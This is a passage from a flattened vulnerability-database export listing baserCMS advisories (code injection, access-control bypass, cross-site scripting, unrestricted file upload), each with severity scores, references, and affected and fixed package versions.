reference_url https://github.com/advisories/GHSA-m9g7-rgfc-jcm7
reference_id GHSA-m9g7-rgfc-jcm7
reference_type
scores
url https://github.com/advisories/GHSA-m9g7-rgfc-jcm7
fixed_packages
0
url pkg:composer/baserproject/basercms@5.2.3
purl pkg:composer/baserproject/basercms@5.2.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3
aliases CVE-2026-30877, GHSA-m9g7-rgfc-jcm7
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-y2sz-c6vb-pkdp
42
url VCID-y9f3-k7xk-rucf
vulnerability_id VCID-y9f3-k7xk-rucf
summary 
Code Injection
baserCMS allows an attacker to execute arbitrary PHP code on the server via unspecified vectors.
references
0
reference_url http://jvn.jp/en/jp/JVN78151490/index.html
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url http://jvn.jp/en/jp/JVN78151490/index.html
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2017-10844
reference_id
reference_type
scores
0
value 0.00568
scoring_system epss
scoring_elements 0.6893
published_at 2026-06-05T12:55:00Z
1
value 0.00568
scoring_system epss
scoring_elements 0.68891
published_at 2026-06-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2017-10844
2
reference_url https://basercms.net/security/JVN78151490
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://basercms.net/security/JVN78151490
3
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2017-10844
reference_id CVE-2017-10844
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2017-10844
fixed_packages
0
url pkg:composer/baserproject/basercms@3.0.15
purl pkg:composer/baserproject/basercms@3.0.15
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1q79-sxzp-zker
1
vulnerability VCID-2u6y-aj6t-7fb1
2
vulnerability VCID-3new-f12y-8bf9
3
vulnerability VCID-4zw8-truk-pugf
4
vulnerability VCID-5ay3-1t5g-vycu
5
vulnerability VCID-6trr-5deb-yydm
6
vulnerability VCID-7x3n-4c2b-nfbx
7
vulnerability VCID-891u-x525-ykbb
8
vulnerability VCID-8buz-nsr9-3yge
9
vulnerability VCID-8ssu-umet-37bk
10
vulnerability VCID-9mf7-56fh-fyfk
11
vulnerability VCID-ays7-6wvh-augt
12
vulnerability VCID-d1sf-cmct-zbh1
13
vulnerability VCID-d5gk-q2hh-kba5
14
vulnerability VCID-e4xa-jm9u-nked
15
vulnerability VCID-eq7f-n3g5-s3hu
16
vulnerability VCID-g56w-z9cx-5ygv
17
vulnerability VCID-ga9u-uv9b-tydr
18
vulnerability VCID-ggv8-3v9t-mfea
19
vulnerability VCID-gsg3-fdmu-vqag
20
vulnerability VCID-hpk4-a6tr-3ffe
21
vulnerability VCID-j37y-gws9-ake9
22
vulnerability VCID-jby7-s5ez-dqb3
23
vulnerability VCID-k575-suuf-7bhf
24
vulnerability VCID-k5qv-4yp3-zbgf
25
vulnerability VCID-khft-xvrw-g3dr
26
vulnerability VCID-kmpp-6j49-pqfz
27
vulnerability VCID-mfm9-gsh3-ubg8
28
vulnerability VCID-nxrf-64er-xbfx
29
vulnerability VCID-p695-t9ye-v3ga
30
vulnerability VCID-p6nr-eu91-53b4
31
vulnerability VCID-pd8c-9d7z-zkhg
32
vulnerability VCID-r4jc-22rq-d3cb
33
vulnerability VCID-sqr4-v889-tff8
34
vulnerability VCID-u16w-rbuk-ybfs
35
vulnerability VCID-uedz-j2vn-cbea
36
vulnerability VCID-vqx2-hzju-r7et
37
vulnerability VCID-xpsb-2yux-g3cf
38
vulnerability VCID-y2sz-c6vb-pkdp
39
vulnerability VCID-yesf-qxgy-3ygx
40
vulnerability VCID-zqd4-rdem-jfgk
41
vulnerability VCID-zsgc-fnen-b7a6
42
vulnerability VCID-zy68-bur9-1fck
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@3.0.15
1
url pkg:composer/baserproject/basercms@4.0.5.1
purl pkg:composer/baserproject/basercms@4.0.5.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1q79-sxzp-zker
1
vulnerability VCID-2u6y-aj6t-7fb1
2
vulnerability VCID-3new-f12y-8bf9
3
vulnerability VCID-4zw8-truk-pugf
4
vulnerability VCID-5ay3-1t5g-vycu
5
vulnerability VCID-6trr-5deb-yydm
6
vulnerability VCID-7x3n-4c2b-nfbx
7
vulnerability VCID-891u-x525-ykbb
8
vulnerability VCID-8buz-nsr9-3yge
9
vulnerability VCID-8ssu-umet-37bk
10
vulnerability VCID-9mf7-56fh-fyfk
11
vulnerability VCID-ays7-6wvh-augt
12
vulnerability VCID-d1sf-cmct-zbh1
13
vulnerability VCID-d5gk-q2hh-kba5
14
vulnerability VCID-e4xa-jm9u-nked
15
vulnerability VCID-eq7f-n3g5-s3hu
16
vulnerability VCID-g56w-z9cx-5ygv
17
vulnerability VCID-ga9u-uv9b-tydr
18
vulnerability VCID-ggv8-3v9t-mfea
19
vulnerability VCID-gsg3-fdmu-vqag
20
vulnerability VCID-hpk4-a6tr-3ffe
21
vulnerability VCID-j37y-gws9-ake9
22
vulnerability VCID-jby7-s5ez-dqb3
23
vulnerability VCID-k575-suuf-7bhf
24
vulnerability VCID-k5qv-4yp3-zbgf
25
vulnerability VCID-khft-xvrw-g3dr
26
vulnerability VCID-kmpp-6j49-pqfz
27
vulnerability VCID-mfm9-gsh3-ubg8
28
vulnerability VCID-nxrf-64er-xbfx
29
vulnerability VCID-p695-t9ye-v3ga
30
vulnerability VCID-p6nr-eu91-53b4
31
vulnerability VCID-pd8c-9d7z-zkhg
32
vulnerability VCID-r4jc-22rq-d3cb
33
vulnerability VCID-sqr4-v889-tff8
34
vulnerability VCID-twf5-bzba-gqb4
35
vulnerability VCID-u16w-rbuk-ybfs
36
vulnerability VCID-uedz-j2vn-cbea
37
vulnerability VCID-vqx2-hzju-r7et
38
vulnerability VCID-wvnk-63hy-ykeq
39
vulnerability VCID-xpsb-2yux-g3cf
40
vulnerability VCID-xxud-7jsh-bbc1
41
vulnerability VCID-y2sz-c6vb-pkdp
42
vulnerability VCID-yesf-qxgy-3ygx
43
vulnerability VCID-zqd4-rdem-jfgk
44
vulnerability VCID-zsgc-fnen-b7a6
45
vulnerability VCID-zy68-bur9-1fck
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.0.5.1
2
url pkg:composer/baserproject/basercms@4.0.6
purl pkg:composer/baserproject/basercms@4.0.6
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1q79-sxzp-zker
1
vulnerability VCID-2u6y-aj6t-7fb1
2
vulnerability VCID-3new-f12y-8bf9
3
vulnerability VCID-4zw8-truk-pugf
4
vulnerability VCID-5ay3-1t5g-vycu
5
vulnerability VCID-6trr-5deb-yydm
6
vulnerability VCID-7x3n-4c2b-nfbx
7
vulnerability VCID-891u-x525-ykbb
8
vulnerability VCID-8buz-nsr9-3yge
9
vulnerability VCID-8ssu-umet-37bk
10
vulnerability VCID-9mf7-56fh-fyfk
11
vulnerability VCID-ays7-6wvh-augt
12
vulnerability VCID-d1sf-cmct-zbh1
13
vulnerability VCID-d5gk-q2hh-kba5
14
vulnerability VCID-e4xa-jm9u-nked
15
vulnerability VCID-eq7f-n3g5-s3hu
16
vulnerability VCID-g56w-z9cx-5ygv
17
vulnerability VCID-ga9u-uv9b-tydr
18
vulnerability VCID-ggv8-3v9t-mfea
19
vulnerability VCID-gsg3-fdmu-vqag
20
vulnerability VCID-hpk4-a6tr-3ffe
21
vulnerability VCID-j37y-gws9-ake9
22
vulnerability VCID-jby7-s5ez-dqb3
23
vulnerability VCID-k575-suuf-7bhf
24
vulnerability VCID-k5qv-4yp3-zbgf
25
vulnerability VCID-khft-xvrw-g3dr
26
vulnerability VCID-kmpp-6j49-pqfz
27
vulnerability VCID-mfm9-gsh3-ubg8
28
vulnerability VCID-nxrf-64er-xbfx
29
vulnerability VCID-p695-t9ye-v3ga
30
vulnerability VCID-p6nr-eu91-53b4
31
vulnerability VCID-pd8c-9d7z-zkhg
32
vulnerability VCID-r4jc-22rq-d3cb
33
vulnerability VCID-sqr4-v889-tff8
34
vulnerability VCID-twf5-bzba-gqb4
35
vulnerability VCID-u16w-rbuk-ybfs
36
vulnerability VCID-uedz-j2vn-cbea
37
vulnerability VCID-vqx2-hzju-r7et
38
vulnerability VCID-wvnk-63hy-ykeq
39
vulnerability VCID-xpsb-2yux-g3cf
40
vulnerability VCID-xxud-7jsh-bbc1
41
vulnerability VCID-y2sz-c6vb-pkdp
42
vulnerability VCID-yesf-qxgy-3ygx
43
vulnerability VCID-zqd4-rdem-jfgk
44
vulnerability VCID-zsgc-fnen-b7a6
45
vulnerability VCID-zy68-bur9-1fck
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.0.6
aliases CVE-2017-10844, GHSA-69gw-v5ph-6vxq
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-y9f3-k7xk-rucf
43
url VCID-yesf-qxgy-3ygx
vulnerability_id VCID-yesf-qxgy-3ygx
summary 
Improper Access Control
baserCMS allows remote authenticated attackers to bypass access restriction to view or alter a restricted content via unspecified vectors.
references
0
reference_url http://jvn.jp/en/jp/JVN67881316/index.html
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url http://jvn.jp/en/jp/JVN67881316/index.html
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2018-0572
reference_id
reference_type
scores
0
value 0.00193
scoring_system epss
scoring_elements 0.41135
published_at 2026-06-05T12:55:00Z
1
value 0.00193
scoring_system epss
scoring_elements 0.4106
published_at 2026-06-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2018-0572
2
reference_url https://basercms.net/security/JVN67881316
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://basercms.net/security/JVN67881316
3
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2018-0572
reference_id CVE-2018-0572
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2018-0572
fixed_packages
0
url pkg:composer/baserproject/basercms@3.0.16
purl pkg:composer/baserproject/basercms@3.0.16
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1q79-sxzp-zker
1
vulnerability VCID-3new-f12y-8bf9
2
vulnerability VCID-4zw8-truk-pugf
3
vulnerability VCID-5ay3-1t5g-vycu
4
vulnerability VCID-7x3n-4c2b-nfbx
5
vulnerability VCID-891u-x525-ykbb
6
vulnerability VCID-8buz-nsr9-3yge
7
vulnerability VCID-8ssu-umet-37bk
8
vulnerability VCID-9mf7-56fh-fyfk
9
vulnerability VCID-ays7-6wvh-augt
10
vulnerability VCID-d1sf-cmct-zbh1
11
vulnerability VCID-d5gk-q2hh-kba5
12
vulnerability VCID-eq7f-n3g5-s3hu
13
vulnerability VCID-g56w-z9cx-5ygv
14
vulnerability VCID-ggv8-3v9t-mfea
15
vulnerability VCID-gsg3-fdmu-vqag
16
vulnerability VCID-hpk4-a6tr-3ffe
17
vulnerability VCID-j37y-gws9-ake9
18
vulnerability VCID-jby7-s5ez-dqb3
19
vulnerability VCID-k575-suuf-7bhf
20
vulnerability VCID-k5qv-4yp3-zbgf
21
vulnerability VCID-khft-xvrw-g3dr
22
vulnerability VCID-kmpp-6j49-pqfz
23
vulnerability VCID-mfm9-gsh3-ubg8
24
vulnerability VCID-nxrf-64er-xbfx
25
vulnerability VCID-p695-t9ye-v3ga
26
vulnerability VCID-p6nr-eu91-53b4
27
vulnerability VCID-pd8c-9d7z-zkhg
28
vulnerability VCID-sqr4-v889-tff8
29
vulnerability VCID-u16w-rbuk-ybfs
30
vulnerability VCID-uedz-j2vn-cbea
31
vulnerability VCID-vqx2-hzju-r7et
32
vulnerability VCID-xpsb-2yux-g3cf
33
vulnerability VCID-y2sz-c6vb-pkdp
34
vulnerability VCID-zqd4-rdem-jfgk
35
vulnerability VCID-zsgc-fnen-b7a6
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@3.0.16
1
url pkg:composer/baserproject/basercms@4.1.1
purl pkg:composer/baserproject/basercms@4.1.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1q79-sxzp-zker
1
vulnerability VCID-3new-f12y-8bf9
2
vulnerability VCID-4zw8-truk-pugf
3
vulnerability VCID-5ay3-1t5g-vycu
4
vulnerability VCID-7x3n-4c2b-nfbx
5
vulnerability VCID-891u-x525-ykbb
6
vulnerability VCID-8buz-nsr9-3yge
7
vulnerability VCID-8ssu-umet-37bk
8
vulnerability VCID-9mf7-56fh-fyfk
9
vulnerability VCID-ays7-6wvh-augt
10
vulnerability VCID-d1sf-cmct-zbh1
11
vulnerability VCID-d5gk-q2hh-kba5
12
vulnerability VCID-eq7f-n3g5-s3hu
13
vulnerability VCID-g56w-z9cx-5ygv
14
vulnerability VCID-ggv8-3v9t-mfea
15
vulnerability VCID-gsg3-fdmu-vqag
16
vulnerability VCID-hpk4-a6tr-3ffe
17
vulnerability VCID-j37y-gws9-ake9
18
vulnerability VCID-jby7-s5ez-dqb3
19
vulnerability VCID-k575-suuf-7bhf
20
vulnerability VCID-k5qv-4yp3-zbgf
21
vulnerability VCID-khft-xvrw-g3dr
22
vulnerability VCID-kmpp-6j49-pqfz
23
vulnerability VCID-mfm9-gsh3-ubg8
24
vulnerability VCID-nxrf-64er-xbfx
25
vulnerability VCID-p695-t9ye-v3ga
26
vulnerability VCID-p6nr-eu91-53b4
27
vulnerability VCID-pd8c-9d7z-zkhg
28
vulnerability VCID-sqr4-v889-tff8
29
vulnerability VCID-twf5-bzba-gqb4
30
vulnerability VCID-u16w-rbuk-ybfs
31
vulnerability VCID-uedz-j2vn-cbea
32
vulnerability VCID-vqx2-hzju-r7et
33
vulnerability VCID-wvnk-63hy-ykeq
34
vulnerability VCID-xpsb-2yux-g3cf
35
vulnerability VCID-xxud-7jsh-bbc1
36
vulnerability VCID-y2sz-c6vb-pkdp
37
vulnerability VCID-zqd4-rdem-jfgk
38
vulnerability VCID-zsgc-fnen-b7a6
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.1.1
aliases CVE-2018-0572, GHSA-mjj9-33j8-pfwh
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-yesf-qxgy-3ygx
44
url VCID-zqd4-rdem-jfgk
vulnerability_id VCID-zqd4-rdem-jfgk
summary 
baserCMS has a cross-site scripting vulnerability in blog posts.

### Target
baserCMS 5.2.1 and earlier versions

### Vulnerability

Malicious Javascript may be executed in blog posts.

### Countermeasures
Update to the latest version of baserCMS

Please refer to the following page to reference for more information.
https://basercms.net/security/JVN_20837860

### Credits

Gai Tanaka@Mitsui Bussan Secure Directions, Inc.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-30879
reference_id
reference_type
scores
0
value 0.00012
scoring_system epss
scoring_elements 0.01615
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-30879
1
reference_url https://basercms.net/security/JVN_20837860
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:00:24Z/
url https://basercms.net/security/JVN_20837860
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/releases/tag/5.2.3
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:00:24Z/
url https://github.com/baserproject/basercms/releases/tag/5.2.3
4
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-jmq3-x8q7-j9qm
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:00:24Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-jmq3-x8q7-j9qm
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-30879
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-30879
6
reference_url https://github.com/advisories/GHSA-jmq3-x8q7-j9qm
reference_id GHSA-jmq3-x8q7-j9qm
reference_type
scores
url https://github.com/advisories/GHSA-jmq3-x8q7-j9qm
fixed_packages
0
url pkg:composer/baserproject/basercms@5.2.3
purl pkg:composer/baserproject/basercms@5.2.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3
aliases CVE-2026-30879, GHSA-jmq3-x8q7-j9qm
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-zqd4-rdem-jfgk
45
url VCID-zsgc-fnen-b7a6
vulnerability_id VCID-zsgc-fnen-b7a6
summary 
Unrestricted Upload of File with Dangerous Type
baserCMS is a Content Management system. Prior to version 4.7.5, any file may be uploaded on the management system of baserCMS. Version 4.7.5 contains a patch.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-25655
reference_id
reference_type
scores
0
value 0.00561
scoring_system epss
scoring_elements 0.68669
published_at 2026-06-04T12:55:00Z
1
value 0.00561
scoring_system epss
scoring_elements 0.6871
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-25655
1
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
2
reference_url https://github.com/baserproject/basercms/commit/922025a98b0e697ab78f6a785a004e0729aa9100
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:30:57Z/
url https://github.com/baserproject/basercms/commit/922025a98b0e697ab78f6a785a004e0729aa9100
3
reference_url https://github.com/baserproject/basercms/commit/9297629983ed908c7f51bf61a0231dde91404ebd
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:30:57Z/
url https://github.com/baserproject/basercms/commit/9297629983ed908c7f51bf61a0231dde91404ebd
4
reference_url https://github.com/baserproject/basercms/releases/tag/basercms-4.7.5
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:30:57Z/
url https://github.com/baserproject/basercms/releases/tag/basercms-4.7.5
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-25655
reference_id CVE-2023-25655
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-25655
6
reference_url https://github.com/advisories/GHSA-mfvg-qwcw-qvc8
reference_id GHSA-mfvg-qwcw-qvc8
reference_type
scores
url https://github.com/advisories/GHSA-mfvg-qwcw-qvc8
7
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-mfvg-qwcw-qvc8
reference_id GHSA-mfvg-qwcw-qvc8
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:30:57Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-mfvg-qwcw-qvc8
fixed_packages
0
url pkg:composer/baserproject/basercms@4.7.5
purl pkg:composer/baserproject/basercms@4.7.5
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-g56w-z9cx-5ygv
7
vulnerability VCID-ggv8-3v9t-mfea
8
vulnerability VCID-jby7-s5ez-dqb3
9
vulnerability VCID-k5qv-4yp3-zbgf
10
vulnerability VCID-khft-xvrw-g3dr
11
vulnerability VCID-mfm9-gsh3-ubg8
12
vulnerability VCID-nxrf-64er-xbfx
13
vulnerability VCID-p695-t9ye-v3ga
14
vulnerability VCID-pd8c-9d7z-zkhg
15
vulnerability VCID-sqr4-v889-tff8
16
vulnerability VCID-u16w-rbuk-ybfs
17
vulnerability VCID-uedz-j2vn-cbea
18
vulnerability VCID-y2sz-c6vb-pkdp
19
vulnerability VCID-zqd4-rdem-jfgk
20
vulnerability VCID-zxns-tzw3-27fr
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.7.5
aliases CVE-2023-25655, GHSA-mfvg-qwcw-qvc8
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-zsgc-fnen-b7a6
46
url VCID-zy68-bur9-1fck
vulnerability_id VCID-zy68-bur9-1fck
summary 
Cross-site Scripting
Cross-site scripting vulnerability in baserCMS allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
references
0
reference_url http://jvn.jp/en/jp/JVN67881316/index.html
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url http://jvn.jp/en/jp/JVN67881316/index.html
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2018-0574
reference_id
reference_type
scores
0
value 0.0026
scoring_system epss
scoring_elements 0.49663
published_at 2026-06-05T12:55:00Z
1
value 0.0026
scoring_system epss
scoring_elements 0.49601
published_at 2026-06-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2018-0574
2
reference_url https://basercms.net/security/JVN67881316
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://basercms.net/security/JVN67881316
3
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2018-0574
reference_id CVE-2018-0574
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2018-0574
fixed_packages
0
url pkg:composer/baserproject/basercms@3.0.16
purl pkg:composer/baserproject/basercms@3.0.16
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1q79-sxzp-zker
1
vulnerability VCID-3new-f12y-8bf9
2
vulnerability VCID-4zw8-truk-pugf
3
vulnerability VCID-5ay3-1t5g-vycu
4
vulnerability VCID-7x3n-4c2b-nfbx
5
vulnerability VCID-891u-x525-ykbb
6
vulnerability VCID-8buz-nsr9-3yge
7
vulnerability VCID-8ssu-umet-37bk
8
vulnerability VCID-9mf7-56fh-fyfk
9
vulnerability VCID-ays7-6wvh-augt
10
vulnerability VCID-d1sf-cmct-zbh1
11
vulnerability VCID-d5gk-q2hh-kba5
12
vulnerability VCID-eq7f-n3g5-s3hu
13
vulnerability VCID-g56w-z9cx-5ygv
14
vulnerability VCID-ggv8-3v9t-mfea
15
vulnerability VCID-gsg3-fdmu-vqag
16
vulnerability VCID-hpk4-a6tr-3ffe
17
vulnerability VCID-j37y-gws9-ake9
18
vulnerability VCID-jby7-s5ez-dqb3
19
vulnerability VCID-k575-suuf-7bhf
20
vulnerability VCID-k5qv-4yp3-zbgf
21
vulnerability VCID-khft-xvrw-g3dr
22
vulnerability VCID-kmpp-6j49-pqfz
23
vulnerability VCID-mfm9-gsh3-ubg8
24
vulnerability VCID-nxrf-64er-xbfx
25
vulnerability VCID-p695-t9ye-v3ga
26
vulnerability VCID-p6nr-eu91-53b4
27
vulnerability VCID-pd8c-9d7z-zkhg
28
vulnerability VCID-sqr4-v889-tff8
29
vulnerability VCID-u16w-rbuk-ybfs
30
vulnerability VCID-uedz-j2vn-cbea
31
vulnerability VCID-vqx2-hzju-r7et
32
vulnerability VCID-xpsb-2yux-g3cf
33
vulnerability VCID-y2sz-c6vb-pkdp
34
vulnerability VCID-zqd4-rdem-jfgk
35
vulnerability VCID-zsgc-fnen-b7a6
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@3.0.16
1
url pkg:composer/baserproject/basercms@4.1.1
purl pkg:composer/baserproject/basercms@4.1.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1q79-sxzp-zker
1
vulnerability VCID-3new-f12y-8bf9
2
vulnerability VCID-4zw8-truk-pugf
3
vulnerability VCID-5ay3-1t5g-vycu
4
vulnerability VCID-7x3n-4c2b-nfbx
5
vulnerability VCID-891u-x525-ykbb
6
vulnerability VCID-8buz-nsr9-3yge
7
vulnerability VCID-8ssu-umet-37bk
8
vulnerability VCID-9mf7-56fh-fyfk
9
vulnerability VCID-ays7-6wvh-augt
10
vulnerability VCID-d1sf-cmct-zbh1
11
vulnerability VCID-d5gk-q2hh-kba5
12
vulnerability VCID-eq7f-n3g5-s3hu
13
vulnerability VCID-g56w-z9cx-5ygv
14
vulnerability VCID-ggv8-3v9t-mfea
15
vulnerability VCID-gsg3-fdmu-vqag
16
vulnerability VCID-hpk4-a6tr-3ffe
17
vulnerability VCID-j37y-gws9-ake9
18
